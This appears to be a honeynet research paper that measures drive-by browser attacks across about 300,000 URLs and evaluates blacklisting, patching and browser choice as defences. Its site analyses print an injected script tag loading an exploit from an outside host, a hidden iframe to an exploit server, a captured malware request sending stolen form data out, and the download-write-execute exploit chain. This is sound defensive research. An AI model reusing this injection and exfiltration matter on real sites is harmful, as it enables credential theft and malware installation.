User content – pages that contain user-generated content, such as forums and blogs
Warez – pages that contain hacking information, including exploits, cracks, serial numbers, etc.

Previously defaced/vulnerable web servers: These URLs point to pages of servers that have been previously defaced or run vulnerable web applications. We obtained the previously defaced sites from http://zone-h.org. A list of vulnerable web servers was generated by issuing Google Hack keywords to search engines.
Sponsored links: These URLs are a list of sponsored links encountered on the Google search engine results page. It was generated by collecting the links from the site http://googspy.com for various keywords.
Typo squatter URLs: These URLs are common typing mistakes of the 500 most popular sites from http://alexa.com (for example http://www.googel.com instead of http://www.google.com). The typo URLs were generated using Microsoft's StriderURLTracer.
Spam: These URLs were mined from several months' worth of Spam messages of the public Spam archive at http://untroubled.org/spam.

The list of URLs as well as the keywords used to obtain the URLs are included in our downloadable data set at http://www.nz-honeynet.org/kye/mws/complete_data_set.zip.
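To illustrate what a typo-squatter candidate looks like, the sketch below generates one common class of typing mistake, the swap of two adjacent characters. It is an assumption-laden illustration with a hypothetical function name, and it is not the algorithm used by StriderURLTracer.

```python
def adjacent_swaps(domain):
    """Return typo variants made by swapping two adjacent characters of the name."""
    name, dot, tld = domain.partition(".")
    typos = set()
    for i in range(len(name) - 1):
        # Swapping identical neighbors would reproduce the original name.
        if name[i] != name[i + 1]:
            swapped = name[:i] + name[i + 1] + name[i] + name[i + 2:]
            typos.add(swapped + dot + tld)
    return sorted(typos)
```

For google.com this yields googel.com, the example given above, along with three other variants.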

We inspected a little over 300,000 URLs from approximately 150,000 hosts in these categories (approximately 130,000 hosts when accounting for the overlap of hosts between categories. No significant overlap between URLs existed). Table 1 and Figure 3 show the detailed breakdown for the different categories and content areas. With each URL that was inspected by the client honeypot, we recorded the classification of the client honeypot (malicious or benign) as well as any unauthorized state changes that occurred in case an attack by a server was encountered (an example can be found as part of our in-depth analysis of the Keith Jarrett fan site). Unfortunately, we could not determine which vulnerability was actually exploited because analysis tools are still immature and not suitable for an automated analysis.

Category	Inspected Hosts	Inspected URLs
Adult	16,375	33,999
Music	13,106	49,269
News	21,188	47,224
User Content	24,331	45,835
Warez	23,530	44,870
Defacement/Vuln	4,844	5,151
Sponsored Links	17,179	42,092
Typo	22,902	22,912
Spam	5,481	11,460
Total	148,936	302,812

Table 1 - Input URLs/ hosts by category

Figure 3 - Input URLs by category

Using these input URLs, we identified a total of 306 malicious URLs from 194 hosts (no significant overlap of hosts or URLs existed). Simply retrieving any one of these URLs with the vulnerable browser caused an unauthorized state change that indicated the attack was successful, and that the server effectively gained control of the client machine. At that point, the server would be able to install malware or obtain confidential information without the user's consent or notice.

The percentage of malicious URLs within each category ranged from 0.0002% for previously defaced/vulnerable web servers to 0.5735% for URLs in the adult category. Table 2 shows the breakdown of the various categories. As is clear from these results, all categories contained malicious URLs. This is an important discovery as it means that anybody accessing the web is at risk regardless of the type of content they browse for or the way the content is accessed. Adjusting browsing behavior is not sufficient to entirely mitigate such risk. Even if a user makes it a policy to only type in URLs rather than following hyperlinks, they are still at risk from typo-squatter URLs. Likewise if a user only accesses hyperlinks or accesses links that are served up by search engines, they are still at risk. Nevertheless, there seem to be some categories that are riskier than others. A Chi-Square test (p<0.01) shows statistical significance between the adult category and Spam; also between Spam and any other category. In other words, there exists an elevated risk of attack when accessing adult content or links in Spam messages.

Category	Malicious Hosts	Malicious URLs	% Malicious URLs
Adult	102	195	0.5735
Spam	17	19	0.1658
Warez	19	27	0.0602
Typo	13	13	0.0567
News	15	20	0.0424
User Content	12	13	0.0284
Music	10	11	0.0223
Sponsored Links	4	7	0.0166
Defacement/Vuln	1	1	0.0002

Table 2 – Identified malicious URLs/ hosts by category
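The percentages in Table 2 and the significance claim can be checked from the counts in Tables 1 and 2. The sketch below recomputes the percentages and a Pearson chi-square statistic for a 2x2 table without continuity correction; the text does not say which variant of the test the authors used, so that choice is an assumption, as are the function names. The critical value 6.635 corresponds to p = 0.01 with one degree of freedom.

```python
# URL counts taken from Table 1 (inspected) and Table 2 (malicious).
INSPECTED_URLS = {"Adult": 33999, "Music": 49269, "News": 47224,
                  "User Content": 45835, "Warez": 44870, "Defacement/Vuln": 5151,
                  "Sponsored Links": 42092, "Typo": 22912, "Spam": 11460}
MALICIOUS_URLS = {"Adult": 195, "Music": 11, "News": 20,
                  "User Content": 13, "Warez": 27, "Defacement/Vuln": 1,
                  "Sponsored Links": 7, "Typo": 13, "Spam": 19}
CRITICAL_P01_DF1 = 6.635  # chi-square critical value, p = 0.01, 1 degree of freedom


def percent_malicious(category):
    return 100.0 * MALICIOUS_URLS[category] / INSPECTED_URLS[category]


def chi_square(cat_a, cat_b):
    """Pearson chi-square for malicious vs. benign URLs in two categories."""
    a, c = MALICIOUS_URLS[cat_a], MALICIOUS_URLS[cat_b]
    b, d = INSPECTED_URLS[cat_a] - a, INSPECTED_URLS[cat_b] - c
    n = a + b + c + d
    return n * (a * d - b * c) ** 2 / ((a + b) * (c + d) * (a + c) * (b + d))
```

Recomputed this way, the Defacement/Vuln row comes to about 0.0194% (1 of 5,151 URLs); the printed value 0.0002 matches the raw fraction rather than a percentage. The other rows agree with the table.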

Figure 4 - Identified malicious URLs by category

We interacted with the 306 malicious URLs repeatedly over a three-week period and made several interesting observations. First, malicious URLs might not be consistently malicious. While one might expect that this is a result of a malicious advertisement that is only displayed occasionally on a page, we did observe some URLs that behaved sporadically that did not contain advertisements, but rather contained a static link to the exploit code. A malicious web page might exhibit malicious behavior only once upon repeated interactions, but it also might behave benignly a few times before it exhibits malicious behavior again. We suspect that such behavior is intentionally employed on the malicious servers in order to evade detection, such as detection by our client honeypot. Furthermore, there are several attack kits that serve malicious content only once per visiting IP address. This is mainly done to disguise the attack. Second, over the three-week period we observed a decline in the number of URLs from the original set of 306 that behaved maliciously. It declined to 180 after two weeks and to 109 after the third week. This is not likely to be indicative of a declining trend of malicious URLs, but rather points to the dynamic nature of the malicious server landscape. Exploits are disappearing from URLs, but we suspect that they are reappearing on another page at the same time. Again, this measure is likely to be employed as a method of evading detection, but also to ensure that attacks are consistently being executed. Such a moving target is more difficult to hit.

DEFENSE EVALUATION

We evaluated various defensive methods with respect to their effectiveness against these malicious servers, namely blacklisting, patching, and using a different browser.

Blacklisting

First, we evaluated blacklisting as a method of defense. We inspected 27,812 URLs of known bad sites. These URLs originate from the well known hosts file from www.mvps.org for DNS blackholing on a Windows machine, and from the clearinghouse of stopbadware.org. A large number of 1,937 URLs successfully attacked our client honeypot running Internet Explorer 6 SP2. This is a percentage of 6.9646%. It appears that the providers of these lists know about malicious URLs that exist on the Internet. However, they only know a minority of malicious URLs. Checking which of the servers that we identified as malicious appear in the lists of known bad sites reveals that only 12% of malicious servers are known.

Does this mean that blacklisting is an ineffective method? In order to answer this question, we repeated our analysis of the 306 malicious URLs on a client honeypot that uses a DNS blackhole list, including the servers in the hosts file from www.mvps.org and the servers in the clearinghouse of stopbadware.org. Considering that only 12% of the servers we identified as malicious were included in our blacklist, one would expect a high number of malicious classifications by our client honeypot to remain. Surprisingly, only one URL remained malicious. We conclude that blacklisting is indeed a very effective method to thwart these attacks.

To understand why blacklisting is an effective method, one needs to take a closer look at the exploits deployed on the URLs. Primarily, exploits are not found directly on a page, but are rather imported from a server (for example, via iframes, redirects, JavaScript client-side redirects, etc.) that specializes in providing exploits as shown in Figure 5. These are centralized machines that are likely to be referenced from numerous URLs. The blacklist that we used seems to include most of these centralized exploit servers, but not the malicious web server that the client initially contacted. Despite this lack of knowledge of the malicious web servers, the exploit can still be successfully blocked via the blacklist because the follow up request to the exploit server that resulted from the redirect is blocked. In the side boxes on in-depth analysis, we take a closer look at the relationship between the input URL and the imported exploits of a specific site.
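The reason a blacklist of exploit servers still protects against an unlisted landing page can be illustrated by checking every request a page visit triggers, not just the first one. The sketch below is hypothetical: the function name and the example hosts are made up, and a real DNS blackhole works at name resolution rather than in application code.

```python
from urllib.parse import urlsplit


def first_blocked_host(request_chain, blacklist):
    """Return the first blacklisted host in a chain of requests, or None.

    request_chain: URLs requested during one page visit, in order
    (landing page first, then iframe imports and redirects).
    """
    for url in request_chain:
        host = urlsplit(url).hostname
        if host in blacklist:
            # The follow-up request is blocked, so the exploit never loads.
            return host
    return None
```

Here a landing page that is not on the blacklist is still rendered harmless, because the imported exploit page lives on a listed host.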

Figure 5 - Central Exploit Server

Patching

Second, we evaluated whether patching is an effective method to defend against malicious web servers. All malicious URLs that we have encountered to date (this includes 47 malicious URLs that were submitted to the client honeypot via our SCOUT web service that allows for an online evaluation of suspicious URLs by our client honeypots) were evaluated once again with a fully patched (as of May 10th 2007) version of Internet Explorer 6. A total of 2,289 URLs were inspected; this resulted in 0 successful compromises.

Patching does seem to be very successful as a defense measure. This comes as no surprise because attackers tend to rely on known exploits if there is a chance of success. And it appears that the odds of success using these older exploits are high, because a large user base still does not seem to use automatic patching on their systems, leaving them vulnerable. The current browser distribution from w3schools.com reveals that Internet Explorer 6 is still used by 38.1% of Internet users worldwide as of May 2007. Considering that Internet Explorer 7 has been pushed as a high security update by Microsoft for several months, there is an indication that a large number of these users probably do not have automatic updates turned on. Some portion of these 38.1% that do have automatic updates turned on have probably made a conscious decision not to update to Internet Explorer 7, but rather to just accept Internet Explorer 6 patches. Nevertheless, we suspect that many simply do not have automatic updates enabled.

Despite its great success as a defensive approach, patching still does not provide complete protection. There is certainly the risk of zero-day exploits that can successfully attack a fully patched version of a browser. In addition, there is the risk of exploits targeting publicly disclosed vulnerabilities for which no patch is currently available. Users of Internet Explorer 6 were in this position recently: in September 2006 due to the VML vulnerability and in March 2007 due to the ANI vulnerability. These vulnerabilities, which allowed for remote code execution, were publicly disclosed and were left unpatched for about one week. We suspect that malicious servers are quick to distribute such exploits as they are very effective and easily obtainable. To confirm this we will need to collect data with our client honeypot farm once a situation similar to the VML or ANI vulnerability arises in the future.

Different Browser

Internet Explorer 6 SP2 is known to be at risk of being attacked by malicious web servers. As the final piece of this study, we evaluated whether using a different browser would be an effective means to reduce the risk of attack. We compared three browsers: Internet Explorer 6 SP2, Firefox 1.5.0 and Opera 8.0.0. The common perception is that Firefox is safe and Internet Explorer is unsafe. However, a review of the remote code execution vulnerabilities (primary source: SecurityFocus) that were publicly disclosed for Firefox 1.5 and Internet Explorer 6 SP2 reveals that, in fact, more were disclosed for Firefox 1.5 (see Figure 6), suggesting that, if anything, the opposite is true.

Figure 6 - Remote code execution vulnerabilities per browser

To determine which browser is actually safer to use, we set up our client honeypots to use these browsers to interact with the servers. Due to time constraints, we were not able to re-evaluate all 300,000 URLs with each browser, but we did reinspect the highly malicious category of adult content comprising approximately 30,000 URLs. As shown in Figure 7, these input URLs, which compromised Internet Explorer 6 SP2 in 0.5735% of cases, did not cause a single successful attack on Firefox 1.5.0 or Opera 8.0.0. Particularly the results on Firefox 1.5.0 are surprising, considering the number of remote code execution vulnerabilities that were publicly disclosed for this browser and the fact that Firefox is also a popular browser. We can only speculate why Firefox wasn't targeted. We suspect that attacking Firefox is a more difficult task as it uses an automated and "immediate" update mechanism. Since Firefox is a standalone application that is not as integrated with the operating system as Internet Explorer, we suspect that users are more likely to have this update mechanism turned on. Firefox is truly a moving target. The success of an attack on a user of Internet Explorer 6 SP2 is likely to be higher than on a Firefox user, and therefore attackers target Internet Explorer 6 SP2.

Figure 7 - Malicious classifications of adult content URLs per browser

IN-DEPTH ANALYSIS

During our study, we encountered many malicious URLs. We have analyzed a few representatives to provide insight on how these servers operate and what sort of harm they can pose to the victim. Please refer to the shaded boxes or feel free to skip ahead to summary and recommendations.

www.keithjarrett.it

Figure 8 - The Keith Jarrett fan site

The Italian fan site of the jazz pianist and composer Keith Jarrett (http://www.keithjarrett.it) is a malicious site. We found this site by submitting the keyword "Keith Jarrett" from our music category to the Yahoo! search engine, which resulted in the return of this URL in the 15th place on the results list. The site itself is quite simple and is shown in Figure 8. It contains text, images, and links, but no rich media content. We chose this site for an in-depth analysis as it includes some typical aspects of a malicious server, such as obfuscation, exploit location on a central exploit provider server, and a typical example of the spyware that is being deployed upon successful exploitation. Besides these elements, it also contains some more advanced techniques that are targeted at a) hiding the attack and b) increasing the likelihood of attack success. Due to space limitations, we only show portions of data from this site, but do make the complete set available from our website at: http://www.nz-honeynet.org/kye/mws/keith_jarrett.zip.

The exploit that triggers upon visitation of the Keith Jarrett site is not directly contained on the page. We do, however, find a snippet of JavaScript code that "imports" the exploit from a different server onto the page. The snippet of code is shown in Figure 9 and initially doesn't give much away since it is obfuscated.

Figure 9 - Obfuscated JavaScript

Because the JavaScript code needs to be converted to clear text in order to "import" the exploit, the decryption routine is included within the JavaScript code. This makes it easy to extract the clear text, which is shown in Figure 10. It is a simple hidden iframe that includes the page out.php from the server crunet.biz. From there, we observed several redirects and more obfuscation until we were able to view the actual exploit code.

Figure 10 - Clear value of obfuscated JavaScript
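As a rough illustration of why shipping the decoding routine with the payload makes the clear text easy to recover, the following Python sketch decodes an encoded string and pulls out the iframe source. The encoding scheme (plain percent-encoding), the exact URL form, and the helper name extract_iframe_sources are assumptions made for illustration; the obfuscation actually used in Figure 9 is not reproduced here.

```python
import re
from urllib.parse import quote, unquote

# Hypothetical stand-in for the obfuscated snippet: the hidden iframe is
# simply percent-encoded. The real site used its own scheme.
clear_html = '<iframe src="http://crunet.biz/out.php" width="0" height="0"></iframe>'
obfuscated = quote(clear_html, safe="")

def extract_iframe_sources(encoded: str) -> list[str]:
    """Decode a percent-encoded blob and return every iframe src it contains."""
    decoded = unquote(encoded)
    return re.findall(r'<iframe[^>]*\bsrc="([^"]+)"', decoded, flags=re.IGNORECASE)

print(extract_iframe_sources(obfuscated))
```

A static scanner that only looks at the encoded form sees no iframe tag at all, which is the effect the obfuscation is after.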

The obfuscation of the iframe code is one step we encountered frequently, intended to hide the attack from static analysis tools, such as network-based intrusion detection systems. On the Keith Jarrett site, we encountered an additional mechanism that was probably designed to evade detection. Our client honeypot was attacked by www.keithjarrett.it during the initial crawl. However, upon subsequent visits to the same URL, the exploit only triggered on occasion. We suspect that this is a measure to evade client honeypots like ours.

The exploit code itself (portions are shown in Figure 11 and Figure 12) contains some interesting aspects we would like to highlight. The attack code is a multi-step attack that first obtains the payload via the XMLHTTP object, writes it to disk via the ADODB (BID: 10514) object and then executes it with the WScript.Shell or Shell.Application object (BID: 10652). This attack path was disabled by Microsoft in 2004 and is not going to be successful unless an unpatched version of Internet Explorer 6 SP2 is used. The attack follows these three stages with each stage using error handling to increase the chances of the attack succeeding (for example, the usage of the Shell.Application object in case the WScript.Shell object fails).

Figure 11 - Exploit code - portion 1

The exploit code doesn't stop there. As previously mentioned, the attack code in Figure 11 will fail on a fully patched version of Internet Explorer. If it does fail, the code in Figure 12 is executed. This code attempts to exploit a vulnerability in Apple's QuickTime (BID: 21829), Winzip (http://www.securityfocus.com/archive/1/455612), and finally in Microsoft's web view (BID: 19030). The first two target much more recent vulnerabilities and non-browser applications, so even a fully patched Internet Explorer would allow for such an attack to be successful if the proper applications are installed. As browsers are becoming more secure, we expect attackers to concentrate on plug-ins and other client applications such as these.

Figure 12 - Exploit code - portion 2

Monitor	Action	Actor	Action parameter
file	Write	C:\Program Files\Internet Explorer\IEXPLORE.EXE	C:\syswcon.exe
process	Created	C:\Program Files\Internet Explorer\IEXPLORE.EXE	C:\syswcon.exe
file	Write	C:\syswcon.exe	C:\WINDOWS\system32\drivers\uzcx.exe
process	Created	C:\syswcon.exe	C:\WINDOWS\system32\drivers\uzcx.exe
process	Terminated	C:\Program Files\Internet Explorer\IEXPLORE.EXE	C:\syswcon.exe
registry	SetValueKey	C:\WINDOWS\system32\drivers\uzcx.exe	HKCU\Software\ewrew\uzcx\main\cid
file	Write	C:\WINDOWS\system32\drivers\uzcx.exe	C:\Documents and Settings\cseifert\Local Settings\Temporary Internet Files\Content.IE5\OPUJWX63\benupd32[1].exe
file	Write	C:\WINDOWS\system32\drivers\uzcx.exe	C:\WINDOWS\benupd32.exe
process	Created	C:\WINDOWS\system32\drivers\uzcx.exe	C:\WINDOWS\benupd32.exe
registry	SetValueKey	C:\WINDOWS\system32\drivers\uzcx.exe	HKCU\Software\ewrew\uzcx\main\term
process	Created	C:\WINDOWS\benupd32.exe	C:\WINDOWS\benupd32.exe
file	Write		C:\Documents and Settings\cseifert\Local Settings\Temp\clean_33d87.dll
process	Created	C:\WINDOWS\benupd32.exe	C:\WINDOWS\system32\regsvr32.exe
registry	SetValueKey	C:\WINDOWS\explorer.exe	HKLM\SYSTEM\ControlSet001\Services\ldrsvc\Parameters\ServiceDll

Table 3 - Keith Jarrett attack – observed state changes

Once the exploit was successful, malware was downloaded and executed on the client machine. All of this, of course, happens in the background and is not noticeable to the user. Table 3 shows some of the actions taken by the exploit and malware; the malware is downloaded and then executes. Multiple executables and DLL files are subsequently written and executed. Benupd32.exe writes the clean_33d87.dll file to disk and proceeds to register and install it as a service, so it will be started automatically upon a reboot of the client machine. These log files were generated with the help of the client honeypot Capture-HPC.
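The pattern visible in Table 3, a file being written and then started as a process, can be picked out of such a log mechanically. The sketch below is an assumption-laden illustration, not Capture-HPC's own log parser: it assumes tab-separated rows in the column order of Table 3, shortens paths to base file names, and the function name dropped_then_executed is hypothetical.

```python
import csv
import io

# Rows modeled on Table 3 (monitor, action, actor, action parameter),
# with paths shortened to base file names for readability.
SAMPLE_LOG = "\n".join([
    "file\tWrite\tIEXPLORE.EXE\tsyswcon.exe",
    "process\tCreated\tIEXPLORE.EXE\tsyswcon.exe",
    "file\tWrite\tsyswcon.exe\tuzcx.exe",
    "process\tCreated\tsyswcon.exe\tuzcx.exe",
    "process\tCreated\tbenupd32.exe\tregsvr32.exe",
])

def dropped_then_executed(log_text):
    """Return (actor, target) pairs where target was written earlier in the log
    and is later created as a process."""
    written = set()
    hits = []
    for monitor, action, actor, target in csv.reader(io.StringIO(log_text), delimiter="\t"):
        if monitor == "file" and action == "Write":
            written.add(target)
        elif monitor == "process" and action == "Created" and target in written:
            hits.append((actor, target))
    return hits

for actor, target in dropped_then_executed(SAMPLE_LOG):
    print(f"{actor} dropped and started {target}")
```

The last sample row is not reported because regsvr32.exe was already on disk rather than written during the visit.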

What does the malware do once it takes control of your system? Sniffing the network stream reveals that during web browsing, in particular form submissions, the malware forwards the content of the form to a malicious data collection server named lddpaym.net. An example of these requests is shown in Figure 13. While we were not able to convert the binary data into clear text, we did discover some clear text data collection files on the web that match the format of the requests that we captured. These files contained a comprehensive list of URLs and the corresponding form data, mostly account names and passwords. The data was neatly separated per client machine, so it grouped the different account information per user. One stolen username and password is already quite dangerous. If the attacker has a collection of various credentials from the same user, for example e-mail and bank account information, it provides the attacker with a much more powerful set of information that will greatly increase the likelihood of a successful scam. For example, the attacker could first disable e-mail notifications from the user's bank before proceeding to raid their bank account.

/ewDf/dBMFJAV3O2VkcWVw1ddn69QPWjtCW2fRVdMXlXLPU8cwRtHhBWXOQbBVYHRAouF
/Fc8/DyO7ZyCkUndVp7pSV6Fm0SGRRa4kFRQgBNAyMbshKusPBloBp7PX0gBT/ydBkAOEpBVk
WjU1JOBQdFN2K6FtXHxSXHd3xSXHxdYasmdQcTEBMSFcxRITEBMXBeF+pA HTTP/1.0
Content-Type: multipart/form-data; boundary=swefasvqdvwxff
Host: lddpaym.net
Content-Length: 999
Connection: Close
User-Agent: MSID [CEB2BB8F6737C1282988A8D3F1DFE91D]|Paladin_IT|107
Pragma: no-cache
--swefasvqdvwxff
Content-Disposition: form-data; name=datafile; filename="data.str"
Content-Type: application/octet-stream
Q+XBMVFhG5Q00cU14KO1zhSPDm7HDrF1gGfSICO7kQJkszUFdVQ/RJWldRC1RgUPJD7Nfodu0l
UgswJhs04Gc1VCtxV1FZhhYHAEYQQzkap1vm5/tH6CZdBXIsQT7yeitmJ1ZeKkzjDA80cTZuIWzPbK
Pw/n2qLFMMeCs4NuV3N0E3QEFXXNoMDF1cE1x/TKZN+u/qfOtjHlo6IQA3+nwrYDhGTUJF7EoB
Bk0RV3dK60md7ON86AR2IURuXX32cCBdPExwSEbtBQUbETt/WSOpGr3m4HftK1s3eCENNfV8Y
Vk9R1pBROEEAhNJd0ZsfeZDubqqduAnXQt7EAg2+nIiXHFPRUdM6AlnEUwTQGBS41Hm4PFjrnoaB
nAgDTv8QChRPUVCTAfrCwcGXhxXZlLpJ+D85GmHIFINMDcbM+52O1I7AFlGXOIMRw1WE1JxV
udN+u7hd/0gS057Jwp28GUsVzoGSk1P6gwGEEIcUHwMqRDj9/Br7kMeWjA8ETfsQChRPUVCTAf8F
gcKQQFWYlmGQern+nbhIEULdyROar1xIFA9S0twT+EKBRVbWlx6R/BG/+/rcM4ZMQFtIBo29nc1XD
dDDh0N4QcHGlsbZ39G6kX166F3/SBOa3cmFTbwZjFQKEpCRAm9TQYXVx1bfHfvRvrl4nuqLF0HZy
UOWud7JlE3UkxHQ65aTRZXEFp7TNdP9uridexmVBx3Jx5X4GskTlRQXkoL8QcNGlxcUHFS5kDH9up
662k7TnsnCnbwZSxXOgRTU1yrSVMHRwxZHnSzEqzX3VzaKlACeCUECMkcdgVqBRcVHaxVUk0RT
QIjA9pjk4GFZc0VLhMXQ
--swefasvqdvwxff--

Figure 13 - Data sent by malware
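Even without decoding the body, the headers in Figure 13 stand out. The sketch below parses the header lines shown above and applies a simple heuristic that flags requests whose User-Agent does not look like a browser. The heuristic and the BROWSER_PREFIXES list are assumptions for illustration, not a detection rule used in the study.

```python
# Header lines copied from Figure 13.
RAW_HEADERS = """Content-Type: multipart/form-data; boundary=swefasvqdvwxff
Host: lddpaym.net
Content-Length: 999
Connection: Close
User-Agent: MSID [CEB2BB8F6737C1282988A8D3F1DFE91D]|Paladin_IT|107
Pragma: no-cache"""

# Assumed prefixes of common browser User-Agent strings (illustrative only).
BROWSER_PREFIXES = ("Mozilla/", "Opera/")

def parse_headers(raw):
    """Turn 'Name: value' lines into a dict keyed by lower-case header name."""
    headers = {}
    for line in raw.splitlines():
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers

def looks_like_browser(headers):
    """True if the User-Agent starts with one of the assumed browser prefixes."""
    return headers.get("user-agent", "").startswith(BROWSER_PREFIXES)

headers = parse_headers(RAW_HEADERS)
print(headers["host"], looks_like_browser(headers))
```

Malware can of course spoof a browser User-Agent, so a check like this only catches the careless cases.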

The server involved in collecting the data was different than the server hosting the actual exploit code. The data collection server was located in the Republic of Moldavia, but registered to a person from Ukraine. The server hosting the exploit code was located in Russia and registered to a person from Germany, and the site we initially accessed (www.keithjarrett.it) was located in Italy. We were unsuccessful when we asked the administrative contacts for the web server initially accessed to remove the malicious code. It is not at all clear whether the original site and the servers hosting the exploit code were controlled by people intent on distributing malware or had been compromised by attackers and modified to distribute it. However, this example illustrates the diverse nature of the components which are, willingly or unwillingly, involved in the scam to obtain (and eventually (ab)use) account data from users. Given such a distributed network of parties and systems, it would be difficult to identify and prosecute the criminals involved.

http://www.anyboard.net/suggest/posts/7933.html

Another malicious page we identified was located on a server that ran the message board Anyboard. We chose to include an in-depth analysis of this site, because it contains interesting aspects around the attack and the malware deployed. This site allows us to illustrate user submitted exploits, additional measures taken to avoid detection, and social engineering aspects that are involved in the scam.

The attack from anyboard.net demonstrates that the operator of the web site might not always be involved in the attack. The attack is possible because the deployed web application on the server follows bad practices, enabling the server to be abused by its users. In this particular instance, the web application allows users to post messages to a threaded message board, but doesn't seem to perform any input validation on the message posts. As a result, malicious users can post harmful JavaScript code. This seems to have happened on post 7933, where a user posted a script to include an exploit, as shown in the HTML code snippet in Figure 14.

…
<div class="MessageBody"><font size=-1 face="Verdana"><script src="http://www.impliedscripting.com/js/?cl=90716&q=interracial+cuckold"></script>
<br ab><center><h1>Free
…

Figure 14 - User supplied exploit

The exploit itself follows the same pattern as the one found on the Keith Jarrett site. The JavaScript is obfuscated, causes several redirects and then triggers the real exploit. The import method, however, is different from the one on the Keith Jarrett site. Instead of using an iframe that imports the exploit, JavaScript code redirects the user to the page that contains the exploit via a client-side redirect as shown in Figure 15. If this code is combined with obfuscation, as was the case here, it is difficult to follow the code in an automated fashion. Crawlers or low-interaction client honeypots need to be JavaScript-aware to do so. This technique illustrates the attempts to avoid detection and identification of the attack.

Figure 15 - Client-side redirect
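To see why a crawler needs to be JavaScript-aware, consider a purely static scan for redirects. The sketch below finds redirect targets only when the assignment appears in clear text. The patterns, the sample pages, and the example.invalid URL are assumptions for illustration and are not taken from Figure 15.

```python
import re

# Two common clear-text forms of a JavaScript redirect (illustrative, not exhaustive).
REDIRECT_PATTERNS = [
    re.compile(r"""(?:window\.|document\.)?location(?:\.href)?\s*=\s*["']([^"']+)["']"""),
    re.compile(r"""location\.replace\(\s*["']([^"']+)["']\s*\)"""),
]

def find_redirect_targets(page_source):
    """Return redirect targets that are visible without executing any script."""
    targets = []
    for pattern in REDIRECT_PATTERNS:
        targets.extend(pattern.findall(page_source))
    return targets

clear_page = '<script>window.location = "http://example.invalid/next";</script>'
# The same kind of redirect hidden behind an encoded string passed to eval().
obfuscated_page = '<script>eval(unescape("%77%69%6e%64%6f%77%2e"));</script>'

print(find_redirect_targets(clear_page))
print(find_redirect_targets(obfuscated_page))
```

The static scan comes back empty for the obfuscated page; only a client that actually executes the script would follow the redirect.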

Figure 16 - Malware notification

Once the exploit triggers and gains control of the client machine, we usually observed a quiet installation of malware that subsequently performs its evil deeds. The exploit encountered on anyboard.net is quite different. It applies a social engineering strategy by disguising itself as anti-malware software, informing the user that malware exists on the machine, and then enticing the user to purchase a license for this "anti-malware software". Figure 16 shows the initial notification about malware existing on the user's machine. Note how the messaging mechanism resembles the messages of the Microsoft Security Center. Shortly after, the software proceeds to scan the machine and provide specific information about the malware that "exists" on the user's machine as shown in Figure 17. Conveniently, a pop-up window suggests purchasing a license for this "anti-malware software" online. Major credit cards are accepted.

Figure 17 - PestTrap

SUMMARY & RECOMMENDATIONS

We have evaluated over 300,000 URLs with our client honeypot Capture-HPC. Several different types of input URLs were inspected by our client honeypot. All input URL categories contained malicious URLs, putting any user accessing the web at risk. As in real life, some "neighborhoods" are more risky than others, but even users that stay clear of these areas can be victimized. We make a few recommendations to reduce the risk of successful attack by a malicious web server. We acknowledge that there is no silver bullet in this effort; rather, our recommendations are designed to reduce the risks to more acceptable levels.

The first recommendation is to reduce the likelihood that a successful attack will do harm. An attack on your browser will inevitably occur, and there are several measures that can make this attack hit a brick wall even if your browser is vulnerable and the attack succeeds. Using the browser as a non-administrator user or within a Sandbox will not allow malware to install itself on the machine. This is already the default on a Windows Vista and Internet Explorer 7 installation, but there are several products freely available for older versions as well, such as AMUST Defender or Sandboxie.

Further, we recommend using a host-based firewall that blocks inbound and outbound connections per application. Many firewalls support a learning mode that dynamically configures the firewall by prompting the user to accept or reject a connection. As users tend to accept the prompts without much consideration, we believe this might result in an insecure configuration; the firewall should rather be configured by an expert after installation. Running a host-based firewall would restrict malware from performing its malicious deeds. The malware pushed by the Keith Jarrett site, for instance, could not send the collected user data to a malicious data collection server if a host-based firewall were installed. The outgoing connection would have been blocked based on the fact that the malware application wasn't authorized to make an outbound connection on port 80. Inbound connection blocking is also important. If malware starts a service that allows the attacker to remotely connect to the machine, for instance via remote desktop software, the firewall could successfully prevent inbound connections from being established. While malware is able to disable such a firewall once it has gained control of the machine, we did not observe such behavior on our client honeypots.
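The per-application decision described above can be sketched as a default-deny lookup. This is a toy model under stated assumptions, not the rule format of any particular firewall product: the Rule fields, the ALLOWED set, and is_allowed are all hypothetical names.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Rule:
    application: str  # executable name, lower case
    direction: str    # "in" or "out"
    port: int

# Hypothetical expert-configured policy: only the browser may talk to web ports.
ALLOWED = {
    Rule("iexplore.exe", "out", 80),
    Rule("iexplore.exe", "out", 443),
}

def is_allowed(application, direction, port):
    """Default deny: a connection passes only if an explicit rule matches."""
    return Rule(application.lower(), direction, port) in ALLOWED

print(is_allowed("IEXPLORE.EXE", "out", 80))   # browser traffic
print(is_allowed("benupd32.exe", "out", 80))   # malware from Table 3, same port
print(is_allowed("benupd32.exe", "in", 3389))  # inbound remote desktop attempt
```

The port alone does not decide the outcome: the malware is refused on port 80 because no rule names that executable.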

Second, we recommend methods that stop the attack. We have shown that blacklisting is an effective technique. Since the landscape of malicious servers is quite dynamic, it is important to update such a blacklist on a regular basis just as one updates antivirus signatures. Alternatively, one can use one of the many browser toolbars that make a safety assessment of the site. Patching is the other mechanism that can prevent attacks. Of course, this only works on attacks for which patches are readily available. We recommend patching not only the operating system and browser, but also plug-ins and non-browser applications. As the exploit found on the Keith Jarrett site has shown, attacks also target applications that one might not think about patching, such as Winzip. Since it is quite difficult to determine whether insecure and unpatched software is running on a system, several tools exist that make this assessment easier. One of these tools is the Secunia Software Inspector, which performs an online scan of the machine to determine whether unpatched software is running. Disabling JavaScript might be another very effective method to stop attacks. Most attacks we observed needed JavaScript to be enabled. Disabling JavaScript, however, might not be feasible as it would severely impact the functionality of many legitimate web sites. Some tools address this problem by globally disabling JavaScript, but selectively enabling it for certain trusted sites. NoScript for the Firefox browser is an example of such a tool.
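A blacklist lookup of the kind recommended here can be sketched in a few lines. The sample entries are the two malicious hosts named earlier in this paper; the matching policy (an entry also covers its subdomains) and the function name is_blacklisted are assumptions for illustration.

```python
from urllib.parse import urlsplit

# Sample entries: hosts named in the Keith Jarrett analysis above.
BLACKLIST = {"crunet.biz", "lddpaym.net"}

def is_blacklisted(url, blacklist=BLACKLIST):
    """True if the URL's host, or any parent domain of it, is on the blacklist."""
    host = (urlsplit(url).hostname or "").lower()
    labels = host.split(".")
    # Check "www.crunet.biz", then "crunet.biz", then "biz".
    return any(".".join(labels[i:]) in blacklist for i in range(len(labels)))

print(is_blacklisted("http://www.crunet.biz/out.php"))
print(is_blacklisted("http://example.org/"))
```

Because malicious servers come and go, the set would have to be refreshed regularly, as the text notes.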

